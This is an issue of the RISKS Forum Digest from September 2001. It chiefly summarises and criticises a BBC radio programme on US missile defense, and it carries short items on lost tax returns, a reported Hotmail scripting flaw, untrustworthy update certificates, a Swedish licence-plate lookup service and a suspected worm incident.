precedence: bulk Subject: Risks Digest 21.63 RISKS-LIST: Risks-Forum Digest Saturday 1 September 2001 Volume 21 : Issue 63 FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks) ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator ***** See last item for further information, disclaimers, caveats, etc. ***** This issue is archived at and by anonymous ftp at ftp.sri.com, cd risks . Contents: The Heavens at War: NMD assessed (Pete Mellor) SDI chief says system may not be reliable (PGN) Federal tax returns missing in Pennsylvania (PGN) Hotmail hackable with one line of code (NewsScan) Even dead people use Microsoft software (Jeremy Epstein) More interesting MS certificates (Stuart Prescott) Directory service based on car license plate (Ulf Lindqvist) Re: Air Force office mails confidential information ... (Jay D. Dyson) Abridged info on RISKS (comp.risks) ---------------------------------------------------------------------- Date: Wed, 29 Aug 2001 11:44:20 +0100 (BST) From: Pete Mellor Subject: The Heavens at War: NMD assessed The Heavens at War: BBC Radio 4, 28th August 2001 Reporter and presenter: Jackie Hardgrave. Preface The following summary is based upon notes made while listening to the first broadcast of the programme, together with reference to the web-site (which does not include a full transcript). It is as fair a summary of the content of the programme as I could manage. However, shorthand is not one of my many talents, and I cannot claim total accuracy. I stand to be corrected if I have misquoted or wrongly attributed a quotation. I have indicated uncertain spellings of people's names by (sp?). I have placed my own comments in brackets: [PM: my comments] and added some more at the end. Please see the web site: http://www.bbc.co.uk/radio4/atoz/heavens_at_war.shtml, or listen to the repeat broadcast on Sunday 2nd September at 5pm (British Summer Time). Introduction The programme concerned the National Missile Defense system (NMD). [PM: It used that name throughout, although the "National" has now been dropped and it is known as "Missile Defense System" (MDS), I believe.] This is also known as "Son of Star Wars" after the nickname for the President Reagan's earlier Strategic Defense Initiative (SDI). Main question: Will the technology work or is it doomed to expensive failure? The threat to the US is now perceived to be from "rogue states" and no longer an all-out nuclear strike from Russia. North Korea, Iran and Iraq were specifically mentioned. Also, although China and Russia have sophisticated systems, an accidental launch is a possible threat. In 1972 only 9 nation states had the capability to launch an intercontinental ballistic missile. This number has vastly increased. Around 1000 ICBMs were produced last year. Their range is continually increasing (e.g., N. Korea has tested a missile with an intercontinental (IC) third stage). There is also the possibility that the possession of intercontinental missiles may be used in diplomatic blackmail to deter the USA from some course of action. Michael O'Hanlon, a Senior Fellow in Foreign Policy Studies at The Brookings Institution (a private institution that studies public policy), gave the example of Iraq launching a new but limited attack on the Kuwaiti oilfields in 10 to 20 years time. If Iraq was by then capable of launching missiles at the USA, and a new "Desert Storm" was on the way, Saddam Hussein (or Uday, who might have taken over by then) would see no reason not to "play for keeps" and threaten to launch an ICBM attack, or actually attack a small city as a demonstration of what they could do. President Reagan began the original "Star Wars" -- which failed due to financial [PM: and technical?] reasons. Why is "Son of Star Wars" under way now? 1998 was a pivotal year. India and Pakistan both tested nuclear warheads. The Rumsfeld (sp?) commission reported that a nation could easily develop the capability to produce nuclear warheads and then surprise the West by suddenly testing them. China was suspected of having obtained the nuclear secrets of the USA by espionage. The Technical Dimension There are three phases in which to destroy an ICBM launched against one's territory:- 1. On first launch, before the missile has left the atmosphere. This provides a very short window of opportunity, but the missile is relatively easily detectable by the plume of exhaust gases from the boosters or first stage launch vehicle. 2. In mid-course, after the missile has left the atmosphere and is following a ballistic trajectory through space. This offers the easiest opportunity, since it is the longest phase. During this phase the missile might break up, and release its warheads and "decoys" (see below) to follow their separate paths. 3. After reentry into the atmosphere when the missile is minutes away from its target. By this stage, the missile will almost certainly have broken up (if it is going to do so), releasing its lethal payload along with its decoys. Three interception test have been conducted so far. [PM: I believe these were mid-course.] Two failed, and the third (a few weeks ago) succeeded [PM: but this "success" has been questioned!]. NMD requires long-range interceptor missiles to destroy hostile ICBMs. The interceptor releases a "kill vehicle" which homes in on, and collides with, the incoming ICBM. No explosives are involved. The concept has been described as a "smart rock" or a "bullet to hit a bullet". [PM: the term "smart rock" cropped up in the earlier SDI also.] A total of 250 interceptor missiles with kill vehicles are to be deployed in Alaska and Florida (?). Incoming ICBMs will be detected by ground-based radar and by satellite-based infrared sensors. Nine new radar systems will sort warheads from decoys. Satellite-based infrared sensors will assist interception in outer space. The problem here is that heavy objects (e.g., nuclear warheads) have the same trajectory as light objects. The incoming ICBM could therefore deploy light weight decoys in large numbers without sacrificing range. For example, decoys could be mylar balloons with aluminium coating. Dozens of these could be released. In some cases, it may be necessary to launch several interceptors. Philip E. Coyle, an advisor to the Center for Defense Information (an independent Military Research Organisation) and until recently the director of Operational Test and Evaluation at the Pentagon, with responsibility for overseeing NMD testing, gave the "hole in one" analogy. Hitting an incoming ICBM is like trying to score hole in one (you only get one shot!) on a golf course where the hole is moving at 15000 mph. With decoys, this is like having a lot of holes with flags to aim at and having to choose the right one at the same time! The problem would be very different in a real situation (unlike the tests conducted so far). Not all eventualities can be planned for. Lisbeth Gronlund, Senior Staff Scientist of the Union of Concerned Scientists, pointed out that any nation that was capable of missile production would find the production of balloon decoys a trivial problem. The tests so far have used decoys, and in the successful test the kill vehicle did pick the correct target, but this was not a realistic test, since the "warhead" was different in appearance and temperature to the decoys [PM: presumably to a degree greater than that which the designers of a real attacking ICBM could achieve?]. At least one of Coyle and Gronlund suggested that NMD will never be tested in realistic conditions before being deployed, since it would almost certainly fail!. O'Hanlon's views partly agreed with this. NMD cannot be tested in a totally real situation. However he believes that it is possible to get close to it, for example by not telling the "defenders" when the "hostile" missile that is their target is to be launched and what decoys it will deploy. He stated that, although it would be a delusion to assume that 100% success could be guaranteed, a 95% confidence in a NMD system would be better than no defence at all. [PM: See below!] The Ballistic Missile Defense Organization adopts a more bullish position: a solution to all of these problems will be found. One telling quotation (unattributed) was: "The United States will do what the United States has to do!" Anyway, the adversary will take time the prepare and test counter-measures, and this activity will betray itself to the intelligence agencies. However, there is a more serious problem if the ICBM carries a lethal chemical or biological payload. Unlike a nuclear warhead, which is an integrated complex device, the lethal material is just "stuff". The payload could divide up into twenty or more bomblets which would be released and would fan out over the target area. These would all be identical in appearance, all real, and all lethal. Faced with this possibility, the defenders' best tactic is to strike immediately after launch, while there is only one target. This requires an interceptor missile close to the point of launch. In practice, this means on board a ship. President Bush has approved the budget to develop this capability. However, neither the ships nor the missiles they will carry have yet been developed, and they will not be ready for service for many years. Tom Colleenor (sp?) pointed out that a strike in the first stage after launch would allow only a minute or two to decide whether to launch the interceptor, which means that the decision must be taken by a field commander. [PM: This has interesting political and strategic military implications!] For a more "Star Wars" approach the team visited Kirkland Air Force base in New Mexico to observe developments in a real "ray gun": the use of a laser beam strike against an ICBM. Undergoing development is the Airborne Laser (ABL) on B747 aircraft. This consists of four lasers, three to track the missile and one to kill it with a one million watt bolt of energy. The attack would proceed as follows: the launch of the hostile ICBM is detected by infrared sensor detection (IRSD) [PM: on the aircraft or on satellite?]. The aircraft uses its tracking lasers to get the range and bearing and locks on to the exhaust plume. It then aims its large laser in the nose of the aircraft at the plume and tracks up to the nose of the missile and unleashes its energy. The effect is not to destroy the missile in a sudden explosion, but to heat the fuel tanks to the extent that they develop cracks and so to cause a structural failure. It will take many years for this to become ready for combat. In the meantime, spin-offs in smaller tactical or space-borne lasers might provide some returns. [PM: Space-borne lasers were a feature of the original SDI. These were to be mounted on orbiting robotic "battle stations". One proposal (which was the subject of actual nuclear tests) was that the gamma radiation from a nuclear explosion could be harnessed into a single collimated beam which would fry everything in its path. A battle station carrying such a weapon would obviously be a "one-shot" device!] Joe Cirincioni (sp?) pointed out that, also in the meantime, the bad guys could develop a few simple counter-measures such as polishing the nose-cone to reduce absorption of radiation, spinning the missile (not as easy as it sounds) to avoid overheating of any one part of the surface, or insulating it with a coating (such as cork!) to avoid things getting too hot. President Bush is apparently willing to spend, spend, spend his way around these minor technical problems. The Political Dimension OK. So what is there for us to worry about here? Answer: Lots! [PM: "Us" seemed to mean Europeans. However, most of the worried voices on the programme were American, which could be good news.] NMD will breach the 1972 Anti-Ballistic Missile (ABM) treaty by end of this year if the Bush administration pursues its present course. The pro-ABM argument is that the treaty achieved a stable stalemate between the two nuclear superpowers during the cold war by preventing either from developing an effective protection system from behind which to launch a pre-emptive nuclear strike, and that it still operates to forestall an offensive arms race. The opposing view was put by Senator Kyle, who argued that the ABM treaty was useful only in the cold war when there were only two nuclear superpowers and that it is no longer relevant. He went on to argue that the treaty was not a cause of stability, and that the offensive arms race continued with the treaty in place. In fact, it locked the superpowers into a strategy based on mutually assured destruction (appropriate acronym: MAD): If you wipe us out, we'll wipe you out, and then we'll all be dead! This no longer makes sense, since there is no longer a monolithic enemy on the other side of an Iron Curtain. The rules have changed, and we in the US will act in our interests, not Russia's nor anyone else's. Russia cannot veto NMD, and indeed, the only sanction it could threaten is a renewal of an offensive arms race which it can no longer afford. President Putin is less than chuffed about this! There is some hope that a detente might be reached around a trade-off of NMD and nuclear weapons reduction, but the USA is currently gung-ho for its impenetrable shield. O'Hanlon was worried that NMD might jeopardise attempts to work with Russia to control, stabilise, and (eventually) decommission (or at least reduce) its nuclear arsenal. It still holds thousands of nuclear warheads mounted on ICBMs. These constitute a hair-trigger weapon which could be aimed at the West in an instant. [PM: Russia announced several years ago that its nuclear missiles were no longer aimed at the West. Unfortunately, to re-aim them would take about as long as it takes to download the software. How long did your last reboot take? Another small point is that many of the weapons are in the territory of (and under the control of?) newly independent and politically unstable states which are ex-USSR.] O'Hanlon said that the fact that the ABM treaty is 30 years old does not make it a "relic". His mortgage is 30 years old, but is still not a relic, and the Constitution of the United States is even older, but is still regarded as a useful document. He cited an interesting example. In 1998 a "sounding" rocket launched from Norway was mistaken for a US attack vehicle by the Russian defences. They were minutes from a retaliatory launch when the mistake was discovered. Ivan Zifrancuk (sp?), a Russian defence expert, was interviewed to give the Russian point of view. America's allies are also worried. Radar bases and communications in the UK are needed for tracking. The Menwith Hills installation has been the target of a Greenpeace protest. [PM: The compliance of the present British government is remarkable, given the likelihood that the presence of tracking stations will make Yorkshire a primary target for America's enemies. France and Germany have been more outspoken.] Phyllis Starkey MP was interviewed and stated that in her opinion NMD was a destabilising influence, and that the British Government should look to British interests O'Hanlon cited the problem of China (particularly sensitive since the loss of one of its fighter aircraft in collision with a US spy plane earlier this year). The Bush administration has taken pains to reassure the Chinese (as it has the Russians) that NMD is not an offensive capability aimed at them. Unfortunately, there is a long-standing dispute over Taiwan, and in the medium term NMD could be capable of neutralising the effect of Chinese missiles. At the last count, China had only 20 missiles capable of reaching American soil. Senator Kyle stated that the USA would never tolerate a military take-over of Taiwan by China, and would come to its defence. The existence of NMD would therefore be perceived as a threat by China, and may provoke an arms race with China. Conclusion The old competition between predator and prey, between defence and offence, between the baron in the castle and the besiegers using the siege catapult were quoted. The difference here is that the "castle" in this new cycle of competition cannot be built without the expenditure of billions of dollars, whereas the "catapult" (the means of penetrating or circumventing NMD) are relatively cheap. So where is the money to come from? Step forward the loyal, long-suffering (and notoriously tight-fisted) US taxpayers! President Bush has promised to lighten their burden. Is NMD consistent with this? As the programme concluded: "The world awaits your decision!" = = = = = = = = Peter Mellor: Personal Comments = = = = = = = = The Missing Dimension: Safety, Reliability, and Software When President Reagan launched the Strategic Defense Initiative (SDI, aka "Star Wars"), it was intended to provide an absolutely impregnable defence for the USA against ICBM attack. It was widely regarded as utterly fantastical in conception, absurdly expensive to design and construct, impossible to test, and ineffective for its intended purpose. An impregnable defence must have a negligible probability of letting one attacking missile through. O'Hanlon states that a "95%" confidence is better than no defence at all. Where thermonuclear devices are concerned, a 1% failure rate under mass attack means that you might as well not have bothered. (I saw a bumper-sticker in California which read: "A single nuclear device can really spoil your day". I agree!) To destroy the USA, only four devices are required, one at each corner, in the stratosphere, outside US territory. The electromagnetic pulse would cause an electrical potential spike which would zap every non-hardened semiconductor device in the country. Eight out of every ten dollars would disappear in an instant. (Think about it!) Hitler gave up on the air assault on Britain since he realised he could not cope with a 10% attrition rate on the raiding forces. Now we need a 99.9999% (or higher) attrition rate. The NMD is a cut-down version of SDI. At least we no longer have to contend with the spectre of a world patrolled by ever-alert robot battle stations in orbit armed with thermonuclear devices to deliver collimated gigawatt doses of energy to anything which ascends above 50,000 feet and rail-guns firing several thousands of rounds per second of hypersonic projectiles at any suspect object in orbit. The NMD proposals are less fantastic, but perhaps the more dangerous for being slightly more plausible. What SDI and NMD have in common is that they are both crucially dependent on software for command and control. The head of software development for SDI was David L. Parnas. Once he became aware that the current software development methods could not yield the impossibly high reliability required for SDI, he did the decent thing and resigned. He did so very publicly and published his reasons for becoming totally disillusioned with the farcical SDI enterprise in a brilliant essay in which he stacked up each one of the then popular methods and showed why it was doomed to fail. [As I recall, David was merely on a review panel, not head of development. PGN] His resignation and essay probably did as much to scupper SDI as its ludicrous and exponentially increasing cost. Now, either we have solved all of the problems with developing high-integrity real-time embedded software in the few years since SDI was abandoned (and I don't believe it for a nanosecond), or we are into another technically infeasible and ultimately farcical project. I have seen no discussion of NMD in the safety-critical systems list recently, and no criticism anywhere from the reliability and safety viewpoint. (It was not even mentioned in the BBC Radio 4 programme "The Heavens at War" that I have summarised above.) The silence is deafening! Peter Mellor, Centre for Software Reliability, City University, Northampton Square, London EC1V 0HB Tel.: +44 (0)20 7040 8422 ) NOTE: Code recently changed from Fax.: +44 (0)20 7040 8585 ) 7477 to 7040 e-mail: Pete Mellor ------------------------------ Date: Wed, 15 Aug 2001 18:31:22 PDT From: "Peter G. Neumann" Subject: SDI chief says system may not be reliable The head of the Pentagon's missile defense programs said he is not fully confident in the "basic functionality" of the anti-missile system that successfully intercepted a mock warhead in space last month. That is why the next test of the system, scheduled for October, will be a replay of the July 14 test, with no additional complexities such as putting more decoys aboard the target missile, Air Force Lt. Gen. Ronald Kadish, director of the Ballistic Missile Defense Organization, told a group of reporters. "It is still not totally comfortable for me to say that we can make the hit-to-kill technology work consistently, even in that simple scenario," Kadish said, adding later, "We still need some more reliability in there." [Source: AP item, Missile Defense Chief 'Not Totally Comfortable' With Reliability of Anti-Missile System, 15 Aug 2001; and then, there are reports of the GPS-aided homing beacon that aided the tests -- even the two that failed! PGN] ------------------------------ Date: Wed, 29 Aug 2001 20:00:05 -0700 (PDT) From: "Peter G. Neumann" Subject: Federal tax returns missing in Pennsylvania As many as 40,000 federal tax returns [earlier thought to be only 1800] and tax payment checks totaling more than $800 million from New England and upstate New York have been lost or destroyed at a processing center operated by the Mellon Bank in Pittsburgh for the Internal Revenue Service. One source was quoted as saying, "The system was flawed. It gave them incentive to stick the payments in a drawer. It was almost cost-effective for Mellon to do that. There was no reward for timely processing." (A somewhat similar case at the IRS Philadelphia center in the mid-1980s was also noted.) [Source: Albert B. Crenshaw, *The Washington Post*, 30 Aug 2001; Page E01] ------------------------------ Date: Fri, 31 Aug 2001 10:35:17 -0700 From: "NewsScan" Subject: Hotmail hackable with one line of code Security consultant Jeremiah Grossman was able to break through Microsoft's Hotmail and Passport protection schemes with just one line of code. Microsoft has patched the code, but Grossman says he could do it again in 8 hours of work. His hacking experiment used a "cross-site scripting" technique that attaches invasive code onto programs used to make Web pages more interactive. Grossman calls them "a breeding ground for new types of Web security vulnerabilities," and Shawn Hernan of the Computer Emergency Response Team at Carnegie Mellon University says that "it's easy to dream up very, very bad scenarios." [*USA Today*, 31 Aug 2001; NewsScan Daily, 31 August 2001 http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security.htm] ------------------------------ Date: Fri, 24 Aug 2001 10:19:27 -0400 From: "Jeremy Epstein" Subject: Even dead people use Microsoft software Computerworld reports that a Microsoft letter-writing campaign opposing the anti-trust actions used the names of dead people. The Utah Attorney General, who received the letters, was not amused. Other Attorneys General received duplicate letters with similar problems. MSFT says they didn't do it, but pointed to "Citizens Against Government Waste" which is a leading the effort. (http://www.computerworld.com/storyba/0,4125,NAV47_STO63256,00.html) The risk is that any sufficiently automated letter writing system is going to eventually screw up and get caught. Dead people don't handwrite letters. ------------------------------ Date: Fri, 24 Aug 2001 10:32:53 +1000 From: Stuart Prescott Subject: More interesting MS certificates I noticed today that the Microsoft WindowsUpdate site was offering a Service Pack 2 for Internet Explorer, and since a number of our machines here use IE5.5 I decided to have a look at what "functionality" it offered. As with all downloads from WindowsUpdate, they are cryptographically signed; however, this time some of the components were signed by "IE Beta Division", with a certificate authority of "IE Beta Division"... i.e. (PGN: pardon the pun) the certificates are not trustworthy. The RISKS? Naturally, there are issues here in verifying that these updates are actually from Microsoft. Then there are the RISKS of users saying "No" to installing the badly signed bits and possibly ending up with a (more) broken IE installation. Or there is the RISK of users becoming used to dismissing error messages.... I didn't realise that MS and IE could become even scarier with time... ------------------------------ Date: Mon, 27 Aug 2001 09:38:03 -0700 (PDT) From: Ulf Lindqvist Subject: Directory service based on car license plate >From Swedish newspaper *Aftonbladet* Aug 27, 2001, http://www.aftonbladet.se/vss/nyheter/story/0,2789,84644,00.html In Sweden, a new type of directory service will soon be introduced by the company Ahhaaa [yes, that actually seems to be their name, see http://www.ahhaaa.com/ ]. You will be able to call this service 24-7, give the license plate number of a car, and they will immediately tell you the name, address and phone number of the person registered as owner of that car. If the owner is a business, they will also tell you the number of employees and annual revenue. The article states a number a "benefits", such as calling the driver who just cut you off to complain, locate parking violators or notify an owner whose car has been broken into. Last but not least, the article suggests that if you find another driver attractive, this service would make it easier to make contact. It does not take a criminal mastermind to see ample opportunities for abuse - road rage, stalking, fraud etc. One could argue that this information has always been available to the public in Sweden, albeit from different sources (see http://justitie.regeringen.se/pressinfo/pdf/publicaccess.pdf for an explanation of the Swedish Principle of Public Access to Information). However, with modern technology, deregulation of telecommunication services, and the ubiquitousness of mobile phones, the information is instantly available and therefore the opportunities to act on impulse are much greater. Ulf Lindqvist, System Design Lab, SRI International, 333 Ravenswood Ave, Menlo Park CA 94025-3493, USA +1 650 859-2351 http://www.sdl.sri.com/ ------------------------------ Date: Sat, 25 Aug 2001 19:30:05 -0700 (PDT) From: "Jay D. Dyson" Subject: Re: Air Force office mails confidential information ... Jim Griffith (RISKS-21.62) noted an Air Force Academy officer accidentally sent confidential information about some 40 cadets to all 4400 cadets at the school. This incident sounds suspiciously like a Sircam worm infection of the officer's system. First off, I doubt that e-mail is typically utilized to send out such reports since such confidential information should never be sent in the clear. Secondly, how else can the Air Force explain the means by which the mail was so readily disseminated? I don't believe we're being told the whole story here. And I believe an officer is being let off the hook when he should be nailed for actions that are tantamount to criminal negligence. ------------------------------ Date: 12 Feb 2001 (LAST-MODIFIED) From: RISKS-request@csl.sri.com Subject: Abridged info on RISKS (comp.risks) The RISKS Forum is a MODERATED digest. Its Usenet equivalent is comp.risks. => SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent) if possible and convenient for you. Alternatively, via majordomo, send e-mail requests to with one-line body subscribe [OR unsubscribe] which requires your ANSWERing confirmation to majordomo@CSL.sri.com . [If E-mail address differs from FROM: subscribe "other-address " ; this requires PGN's intervention -- but hinders spamming subscriptions, etc.] Lower-case only in address may get around a confirmation match glitch. INFO [for unabridged version of RISKS information] There seems to be an occasional glitch in the confirmation process, in which case send mail to RISKS with a suitable SUBJECT and we'll do it manually. .MIL users should contact (Dennis Rears). .UK users should contact . => The INFO file (submissions, default disclaimers, archive sites, copyright policy, PRIVACY digests, etc.) is also obtainable from http://www.CSL.sri.com/risksinfo.html ftp://www.CSL.sri.com/pub/risks.info The full info file will appear now and then in future issues. *** All contributors are assumed to have read the full info file for guidelines. *** => SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line. => ARCHIVES are available: ftp://ftp.sri.com/risks or ftp ftp.sri.comlogin anonymous[YourNetAddress]cd risks [volume-summary issues are in risks-*.00] [back volumes have their own subdirectories, e.g., "cd 20" for volume 20] http://catless.ncl.ac.uk/Risks/VL.IS.html [i.e., VoLume, ISsue]. Lindsay Marshall has also added to the Newcastle catless site a palmtop version of the most recent RISKS issue and a WAP version that works for many but not all telephones: http://catless.ncl.ac.uk/w/r http://the.wiretapped.net/security/info/textfiles/risks-digest/ . http://www.planetmirror.com/pub/risks/ ftp://ftp.planetmirror.com/pub/risks/ ==> PGN's comprehensive historical Illustrative Risks summary of one liners: http://www.csl.sri.com/illustrative.html for browsing, http://www.csl.sri.com/illustrative.pdf or .ps for printing ------------------------------ End of RISKS-FORUM Digest 21.63 ************************